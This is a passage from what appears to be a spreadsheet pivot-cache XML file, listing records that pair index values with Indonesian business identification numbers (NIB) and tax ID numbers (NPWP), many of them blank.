    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4451"/>
    <s v="nib"/>
    <n v="9120017240543"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="npwp"/>
    <n v="26130955037000"/>
  </r>
  <r>
    <x v="4452"/>
    <s v="nib"/>
    <n v="9120106562632"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4450"/>
    <s v="npwp"/>
    <n v="960011336418000"/>
  </r>
  <r>
    <x v="4453"/>
    <s v="nib"/>
    <n v="220400841319"/>
  </r>
  <r>
    <x v="4446"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="npwp"/>
    <n v="26130955037000"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4454"/>
    <s v="nib"/>
    <n v="8120008991728"/>
  </r>
  <r>
    <x v="4455"/>
    <s v="nib"/>
    <n v="9120001101313"/>
  </r>
  <r>
    <x v="4456"/>
    <s v="nib"/>
    <n v="9120508753203"/>
  </r>
  <r>
    <x v="4456"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4457"/>
    <s v="nib"/>
    <n v="9120202252689"/>
  </r>
  <r>
    <x v="4244"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4448"/>
    <s v="npwp"/>
    <s v="NPWP HARTONO"/>
  </r>
  <r>
    <x v="4449"/>
    <s v="npwp"/>
    <s v="NPWP"/>
  </r>
  <r>
    <x v="973"/>
    <s v="nib"/>
    <n v="8120003840633"/>
  </r>
  <r>
    <x v="4458"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4386"/>
    <s v="npwp"/>
    <s v="01.002.749.8-811.001"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4281"/>
    <s v="npwp"/>
    <s v="70.641.535.3-811.000"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4459"/>
    <s v="nib"/>
    <n v="220001520556"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4457"/>
    <s v="npwp"/>
    <s v="90.549.032.2-627.000"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4455"/>
    <s v="npwp"/>
    <n v="314475807809000"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120004801168"/>
  </r>
  <r>
    <x v="4460"/>
    <s v="nib"/>
    <n v="9120415083102"/>
  </r>
  <r>
    <x v="4461"/>
    <s v="nib"/>
    <n v="9120100191247"/>
  </r>
  <r>
    <x v="4462"/>
    <s v="nib"/>
    <n v="8120116081128"/>
  </r>
  <r>
    <x v="4463"/>
    <s v="nib"/>
    <n v="220004182014"/>
  </r>
  <r>
    <x v="4458"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4464"/>
    <s v="nib"/>
    <n v="8120210022746"/>
  </r>
  <r>
    <x v="4465"/>
    <s v="nib"/>
    <n v="220204251476"/>
  </r>
  <r>
    <x v="1033"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4466"/>
    <s v="nib"/>
    <n v="259010000936"/>
  </r>
  <r>
    <x v="1070"/>
    <s v="nib"/>
    <n v="220005572461"/>
  </r>
  <r>
    <x v="4460"/>
    <s v="npwp"/>
    <s v="93.222.511.3-911.000"/>
  </r>
  <r>
    <x v="4383"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4467"/>
    <s v="nib"/>
    <n v="8120007961634"/>
  </r>
  <r>
    <x v="4341"/>
    <s v="npwp"/>
    <s v="47.172.217.3-125.000"/>
  </r>
  <r>
    <x v="4468"/>
    <s v="nib"/>
    <n v="282000922384"/>
  </r>
  <r>
    <x v="4462"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4469"/>
    <s v="nib"/>
    <n v="220003790696"/>
  </r>
  <r>
    <x v="4470"/>
    <s v="nib"/>
    <n v="8120202990554"/>
  </r>
  <r>
    <x v="4471"/>
    <s v="nib"/>
    <n v="8120006931042"/>
  </r>
  <r>
    <x v="4467"/>
    <s v="npwp"/>
    <s v="82.405.094.2-432.000"/>
  </r>
  <r>
    <x v="4472"/>
    <s v="nib"/>
    <n v="262010020276"/>
  </r>
  <r>
    <x v="1110"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4473"/>
    <s v="nib"/>
    <n v="252010020455"/>
  </r>
  <r>
    <x v="4474"/>
    <s v="nib"/>
    <n v="262010020276"/>
  </r>
  <r>
    <x v="4475"/>
    <s v="nib"/>
    <n v="262010020276"/>
  </r>
  <r>
    <x v="4476"/>
    <s v="nib"/>
    <n v="220105463303"/>
  </r>
  <r>
    <x v="4470"/>
    <s v="npwp"/>
    <s v="01.454.019-654.002"/>
  </r>
  <r>
    <x v="4477"/>
    <s v="nib"/>
    <n v="220309220153"/>
  </r>
  <r>
    <x v="1172"/>
    <s v="nib"/>
    <n v="912008702965"/>
  </r>
  <r>
    <x v="975"/>
    <s v="nib"/>
    <n v="8120109802991"/>
  </r>
  <r>
    <x v="4478"/>
    <s v="nib"/>
    <n v="220107171841"/>
  </r>
  <r>
    <x v="1053"/>
    <s v="nib"/>
    <n v="9120100191247"/>
  </r>
  <r>
    <x v="4473"/>
    <s v="npwp"/>
    <n v="15624174805000"/>
  </r>
  <r>
    <x v="4445"/>
    <s v="npwp"/>
    <s v="01.061.076.4-093.000"/>
  </r>
  <r>
    <x v="4459"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4479"/>
    <s v="nib"/>
    <n v="8120101942174"/>
  </r>
  <r>
    <x v="4480"/>
    <s v="nib"/>
    <n v="8120212221176"/>
  </r>
  <r>
    <x v="4481"/>
    <s v="nib"/>
    <n v="8120212221176"/>
  </r>
  <r>
    <x v="4482"/>
    <s v="nib"/>
    <n v="220106332508"/>
  </r>
  <r>
    <x v="4483"/>
    <s v="nib"/>
    <n v="220003652671"/>
  </r>
  <r>
    <x v="33"/>
    <s v="nib"/>
    <n v="8120004871089"/>
  </r>
  <r>
    <x v="440"/>
    <s v="nib"/>
    <n v="8120007921536"/>
  </r>
  <r>
    <x v="936"/>
    <s v="nib"/>
    <n v="9120301152923"/>
  </r>
  <r>
    <x v="4484"/>
    <s v="nib"/>
    <n v="246010010887"/>
  </r>
  <r>
    <x v="4485"/>
    <s v="nib"/>
    <n v="220005880136"/>
  </r>
  <r>
    <x v="4430"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1069"/>
    <s v="nib"/>
    <n v="8120003931926"/>
  </r>
  <r>
    <x v="1823"/>
    <s v="npwp"/>
    <s v="73.137.979.8-814.000"/>
  </r>
  <r>
    <x v="4486"/>
    <s v="nib"/>
    <n v="220002740813"/>
  </r>
  <r>
    <x v="4487"/>
    <s v="nib"/>
    <n v="220004221456"/>
  </r>
  <r>
    <x v="4488"/>
    <s v="nib"/>
    <n v="203010031352"/>
  </r>
  <r>
    <x v="733"/>
    <s v="nib"/>
    <n v="8120118050622"/>
  </r>
  <r>
    <x v="4485"/>
    <s v="npwp"/>
    <n v="806060927047000"/>
  </r>
  <r>
    <x v="4489"/>
    <s v="nib"/>
    <n v="220003652671"/>
  </r>
  <r>
    <x v="88"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4490"/>
    <s v="nib"/>
    <n v="235001900974"/>
  </r>
  <r>
    <x v="921"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1031"/>
    <s v="nib"/>
    <n v="9120305962468"/>
  </r>
  <r>
    <x v="4489"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4491"/>
    <s v="nib"/>
    <n v="8120001970582"/>
  </r>
  <r>
    <x v="4490"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4492"/>
    <s v="nib"/>
    <n v="9120309321121"/>
  </r>
  <r>
    <x v="4493"/>
    <s v="nib"/>
    <n v="9120008881244"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="npwp"/>
    <s v="95.769.679.2-113.000"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4488"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4494"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2208"/>
    <s v="npwp"/>
    <s v="NPNW Perorangan"/>
  </r>
  <r>
    <x v="4495"/>
    <s v="nib"/>
    <n v="220008672693"/>
  </r>
  <r>
    <x v="4313"/>
    <s v="npwp"/>
    <s v="76.680.391.0-724.000"/>
  </r>
  <r>
    <x v="4496"/>
    <s v="nib"/>
    <n v="217000932225"/>
  </r>
  <r>
    <x v="4477"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4426"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4497"/>
    <s v="nib"/>
    <n v="9120200541607"/>
  </r>
  <r>
    <x v="1042"/>
    <s v="nib"/>
    <n v="8120100910932"/>
  </r>
  <r>
    <x v="4498"/>
    <s v="nib"/>
    <n v="9120208601199"/>
  </r>
  <r>
    <x v="1149"/>
    <s v="nib"/>
    <n v="8120111120124"/>
  </r>
  <r>
    <x v="4499"/>
    <s v="nib"/>
    <n v="9120317101046"/>
  </r>
  <r>
    <x v="4494"/>
    <s v="npwp"/>
    <s v="95.769.679.2-113.000"/>
  </r>
  <r>
    <x v="4500"/>
    <s v="nib"/>
    <n v="9120014040986"/>
  </r>
  <r>
    <x v="4501"/>
    <s v="nib"/>
    <n v="220404841125"/>
  </r>
  <r>
    <x v="4502"/>
    <s v="nib"/>
    <n v="9120014060347"/>
  </r>
  <r>
    <x v="4503"/>
    <s v="nib"/>
    <n v="243000920164"/>
  </r>
  <r>
    <x v="4504"/>
    <s v="nib"/>
    <n v="220105172074"/>
  </r>
  <r>
    <x v="4505"/>
    <s v="nib"/>
    <n v="220300321423"/>
  </r>
  <r>
    <x v="4506"/>
    <s v="nib"/>
    <n v="258000902745"/>
  </r>
  <r>
    <x v="4507"/>
    <s v="nib"/>
    <n v="220205652157"/>
  </r>
  <r>
    <x v="4508"/>
    <s v="nib"/>
    <n v="9120319181433"/>
  </r>
  <r>
    <x v="4509"/>
    <s v="nib"/>
    <n v="220306241704"/>
  </r>
  <r>
    <x v="4510"/>
    <s v="nib"/>
    <n v="9120107722945"/>
  </r>
  <r>
    <x v="4506"/>
    <s v="npwp"/>
    <s v="NPWP"/>
  </r>
  <r>
    <x v="465"/>
    <s v="nib"/>
    <n v="8120102811563"/>
  </r>
  <r>
    <x v="4508"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4492"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4509"/>
    <s v="npwp"/>
    <s v="80.382.740.1-223.000"/>
  </r>
  <r>
    <x v="4491"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4511"/>
    <s v="nib"/>
    <n v="9120104110126"/>
  </r>
  <r>
    <x v="4507"/>
    <s v="npwp"/>
    <s v="94.685.354.6-112.000"/>
  </r>
  <r>
    <x v="4498"/>
    <s v="npwp"/>
    <s v="91.490.015.4-704.000"/>
  </r>
  <r>
    <x v="793"/>
    <s v="nib"/>
    <n v="9120316080573"/>
  </r>
  <r>
    <x v="4503"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="650"/>
    <s v="nib"/>
    <n v="217000932225"/>
  </r>
  <r>
    <x v="4512"/>
    <s v="nib"/>
    <n v="9120004163216"/>
  </r>
  <r>
    <x v="4513"/>
    <s v="nib"/>
    <n v="220101812756"/>
  </r>
  <r>
    <x v="4502"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4514"/>
    <s v="nib"/>
    <n v="8120200831147"/>
  </r>
  <r>
    <x v="4515"/>
    <s v="nib"/>
    <n v="220200720473"/>
  </r>
  <r>
    <x v="647"/>
    <s v="nib"/>
    <n v="9120006590079"/>
  </r>
  <r>
    <x v="4516"/>
    <s v="nib"/>
    <n v="211013042233"/>
  </r>
  <r>
    <x v="1059"/>
    <s v="nib"/>
    <n v="8120110232884"/>
  </r>
  <r>
    <x v="4517"/>
    <s v="nib"/>
    <n v="286000932356"/>
  </r>
  <r>
    <x v="4518"/>
    <s v="nib"/>
    <n v="224000922999"/>
  </r>
  <r>
    <x v="1101"/>
    <s v="nib"/>
    <n v="8120116081128"/>
  </r>
  <r>
    <x v="4519"/>
    <s v="nib"/>
    <n v="261000931662"/>
  </r>
  <r>
    <x v="4516"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4520"/>
    <s v="nib"/>
    <n v="9120004262633"/>
  </r>
  <r>
    <x v="4521"/>
    <s v="nib"/>
    <n v="220009750529"/>
  </r>
  <r>
    <x v="4486"/>
    <s v="npwp"/>
    <s v="95.227.250.8-041.000"/>
  </r>
  <r>
    <x v="4504"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4522"/>
    <s v="nib"/>
    <n v="220200131974"/>
  </r>
  <r>
    <x v="4493"/>
    <s v="npwp"/>
    <n v="821470325629000"/>
  </r>
  <r>
    <x v="4523"/>
    <s v="nib"/>
    <n v="231012062734"/>
  </r>
  <r>
    <x v="4520"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4521"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4524"/>
    <s v="nib"/>
    <n v="220101812756"/>
  </r>
  <r>
    <x v="4511"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4496"/>
    <s v="npwp"/>
    <s v="71.605.591.8-805.000"/>
  </r>
  <r>
    <x v="4525"/>
    <s v="nib"/>
    <n v="9120201961605"/>
  </r>
  <r>
    <x v="4526"/>
    <s v="nib"/>
    <n v="220107510869"/>
  </r>
  <r>
    <x v="4527"/>
    <s v="nib"/>
    <n v="9120207772143"/>
  </r>
  <r>
    <x v="165"/>
    <s v="nib"/>
    <n v="288010061363"/>
  </r>
  <r>
    <x v="4528"/>
    <s v="nib"/>
    <n v="230000952288"/>
  </r>
  <r>
    <x v="4529"/>
    <s v="nib"/>
    <n v="220005572461"/>
  </r>
  <r>
    <x v="4530"/>
    <s v="nib"/>
    <n v="2200031411052"/>
  </r>
  <r>
    <x v="4531"/>
    <s v="nib"/>
    <n v="220003141052"/>
  </r>
  <r>
    <x v="4532"/>
    <s v="nib"/>
    <n v="220103500052"/>
  </r>
  <r>
    <x v="2277"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4529"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4513"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4523"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4433"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4526"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4528"/>
    <s v="npwp"/>
    <s v=" 95.766.100.2-047.000 "/>
  </r>
  <r>
    <x v="4533"/>
    <s v="nib"/>
    <n v="9120007591035"/>
  </r>
  <r>
    <x v="4534"/>
    <s v="nib"/>
    <n v="9120008472899"/>
  </r>
  <r>
    <x v="4499"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1261"/>
    <s v="nib"/>
    <n v="9120003632565"/>
  </r>
  <r>
    <x v="4525"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4535"/>
    <s v="nib"/>
    <n v="8120112030248"/>
  </r>
  <r>
    <x v="4500"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4536"/>
    <s v="nib"/>
    <n v="9120203131559"/>
  </r>
  <r>
    <x v="512"/>
    <s v="nib"/>
    <n v="220202800044"/>
  </r>
  <r>
    <x v="4537"/>
    <s v="nib"/>
    <n v="220001771974"/>
  </r>
  <r>
    <x v="1090"/>
    <s v="nib"/>
    <n v="8120204860414"/>
  </r>
  <r>
    <x v="4538"/>
    <s v="nib"/>
    <n v="280010130945"/>
  </r>
  <r>
    <x v="4539"/>
    <s v="nib"/>
    <n v="9120105962205"/>
  </r>
  <r>
    <x v="4515"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4540"/>
    <s v="nib"/>
    <n v="220203250463"/>
  </r>
  <r>
    <x v="4540"/>
    <s v="npwp"/>
    <s v="93.663.367.6-732.000"/>
  </r>
  <r>
    <x v="4537"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4535"/>
    <s v="npwp"/>
    <s v="74.623.117.4-804.000"/>
  </r>
  <r>
    <x v="4541"/>
    <s v="nib"/>
    <n v="220000651856"/>
  </r>
  <r>
    <x v="4542"/>
    <s v="nib"/>
    <n v="8120113132989"/>
  </r>
  <r>
    <x v="4543"/>
    <s v="nib"/>
    <n v="9120108382555"/>
  </r>
  <r>
    <x v="4544"/>
    <s v="nib"/>
    <n v="220905970814"/>
  </r>
  <r>
    <x v="4532"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4510"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4536"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4533"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4545"/>
    <s v="nib"/>
    <n v="8120010060983"/>
  </r>
  <r>
    <x v="4546"/>
    <s v="nib"/>
    <n v="270010160587"/>
  </r>
  <r>
    <x v="4547"/>
    <s v="nib"/>
    <n v="22100096058"/>
  </r>
  <r>
    <x v="4548"/>
    <s v="nib"/>
    <n v="9120208900697"/>
  </r>
  <r>
    <x v="4549"/>
    <s v="nib"/>
    <n v="9120212261734"/>
  </r>
  <r>
    <x v="4543"/>
    <s v="npwp"/>
    <s v="76.040.337.8-822.000"/>
  </r>
  <r>
    <x v="4534"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4212"/>
    <s v="npwp"/>
    <s v="01.324.123.7-038.000"/>
  </r>
  <r>
    <x v="4550"/>
    <s v="nib"/>
    <n v="81203140111064"/>
  </r>
  <r>
    <x v="4551"/>
    <s v="nib"/>
    <n v="8120003772189"/>
  </r>
  <r>
    <x v="4552"/>
    <s v="nib"/>
    <n v="8120310023206"/>
  </r>
  <r>
    <x v="4553"/>
    <s v="nib"/>
    <n v="1250000321876"/>
  </r>
  <r>
    <x v="4550"/>
    <s v="npwp"/>
    <s v="21.118.829.7-047.000"/>
  </r>
  <r>
    <x v="4554"/>
    <s v="nib"/>
    <n v="8120003833308"/>
  </r>
  <r>
    <x v="4555"/>
    <s v="nib"/>
    <n v="200010101139"/>
  </r>
  <r>
    <x v="4556"/>
    <s v="nib"/>
    <n v="1236000632483"/>
  </r>
  <r>
    <x v="4557"/>
    <s v="nib"/>
    <n v="9120110041916"/>
  </r>
  <r>
    <x v="4558"/>
    <s v="nib"/>
    <n v="203010011912"/>
  </r>
  <r>
    <x v="4549"/>
    <s v="npwp"/>
    <n v="541636411501000"/>
  </r>
  <r>
    <x v="4559"/>
    <s v="nib"/>
    <n v="8120001820471"/>
  </r>
  <r>
    <x v="4560"/>
    <s v="nib"/>
    <n v="8120005920342"/>
  </r>
  <r>
    <x v="4561"/>
    <s v="nib"/>
    <n v="8120003772189"/>
  </r>
  <r>
    <x v="4562"/>
    <s v="nib"/>
    <n v="8120003772189"/>
  </r>
  <r>
    <x v="4551"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4563"/>
    <s v="nib"/>
    <n v="9120213150563"/>
  </r>
  <r>
    <x v="4564"/>
    <s v="nib"/>
    <n v="9120213150563"/>
  </r>
  <r>
    <x v="4565"/>
    <s v="nib"/>
    <n v="9120412271603"/>
  </r>
  <r>
    <x v="4565"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4566"/>
    <s v="nib"/>
    <n v="203010011912"/>
  </r>
  <r>
    <x v="4556"/>
    <s v="npwp"/>
    <n v="722686532629000"/>
  </r>
  <r>
    <x v="4567"/>
    <s v="nib"/>
    <n v="260000940773"/>
  </r>
  <r>
    <x v="4568"/>
    <s v="nib"/>
    <n v="277011032674"/>
  </r>
  <r>
    <x v="4548"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1034"/>
    <s v="nib"/>
    <n v="8120106812741"/>
  </r>
  <r>
    <x v="2018"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4560"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4569"/>
    <s v="nib"/>
    <n v="9120006461831"/>
  </r>
  <r>
    <x v="4570"/>
    <s v="nib"/>
    <n v="290010101786"/>
  </r>
  <r>
    <x v="4571"/>
    <s v="nib"/>
    <n v="203010011912"/>
  </r>
  <r>
    <x v="4572"/>
    <s v="nib"/>
    <n v="207010161678"/>
  </r>
  <r>
    <x v="4573"/>
    <s v="nib"/>
    <n v="9120006461831"/>
  </r>
  <r>
    <x v="4557"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4574"/>
    <s v="nib"/>
    <n v="220203752922"/>
  </r>
  <r>
    <x v="4575"/>
    <s v="nib"/>
    <n v="9120203760312"/>
  </r>
  <r>
    <x v="4576"/>
    <s v="nib"/>
    <n v="8120213191569"/>
  </r>
  <r>
    <x v="4577"/>
    <s v="nib"/>
    <n v="202000971481"/>
  </r>
  <r>
    <x v="4568"/>
    <s v="npwp"/>
    <s v="02.670.951.9-603.000"/>
  </r>
  <r>
    <x v="4578"/>
    <s v="nib"/>
    <n v="9120302920523"/>
  </r>
  <r>
    <x v="4579"/>
    <s v="nib"/>
    <n v="236011092135"/>
  </r>
  <r>
    <x v="4580"/>
    <s v="nib"/>
    <n v="9120006461831"/>
  </r>
  <r>
    <x v="4581"/>
    <s v="nib"/>
    <n v="9120302920523"/>
  </r>
  <r>
    <x v="4582"/>
    <s v="nib"/>
    <n v="278010171491"/>
  </r>
  <r>
    <x v="4583"/>
    <s v="nib"/>
    <n v="220102762728"/>
  </r>
  <r>
    <x v="4584"/>
    <s v="nib"/>
    <n v="220102762728"/>
  </r>
  <r>
    <x v="4585"/>
    <s v="nib"/>
    <n v="9120405972336"/>
  </r>
  <r>
    <x v="4436"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4586"/>
    <s v="nib"/>
    <n v="8120213191569"/>
  </r>
  <r>
    <x v="4546"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4587"/>
    <s v="nib"/>
    <n v="8120119123905"/>
  </r>
  <r>
    <x v="4539"/>
    <s v="npwp"/>
    <n v="734600638426000"/>
  </r>
  <r>
    <x v="4588"/>
    <s v="nib"/>
    <n v="9120101370449"/>
  </r>
  <r>
    <x v="4589"/>
    <s v="nib"/>
    <n v="220904930829"/>
  </r>
  <r>
    <x v="4574"/>
    <s v="npwp"/>
    <n v="860964139507000"/>
  </r>
  <r>
    <x v="4581"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4576"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4590"/>
    <s v="nib"/>
    <n v="222010191215"/>
  </r>
  <r>
    <x v="4247"/>
    <s v="npwp"/>
    <s v="02.379.509.9-041.000"/>
  </r>
  <r>
    <x v="4527"/>
    <s v="npwp"/>
    <n v="918183534407000"/>
  </r>
  <r>
    <x v="4591"/>
    <s v="nib"/>
    <n v="241010210915"/>
  </r>
  <r>
    <x v="4592"/>
    <s v="nib"/>
    <n v="209010152149"/>
  </r>
  <r>
    <x v="4572"/>
    <s v="npwp"/>
    <s v="25.768.366.5/435.000"/>
  </r>
  <r>
    <x v="4593"/>
    <s v="nib"/>
    <n v="220904930829"/>
  </r>
  <r>
    <x v="4594"/>
    <s v="nib"/>
    <n v="8120002841036"/>
  </r>
  <r>
    <x v="2240"/>
    <s v="npwp"/>
    <s v="01.360.591.0-007.000"/>
  </r>
  <r>
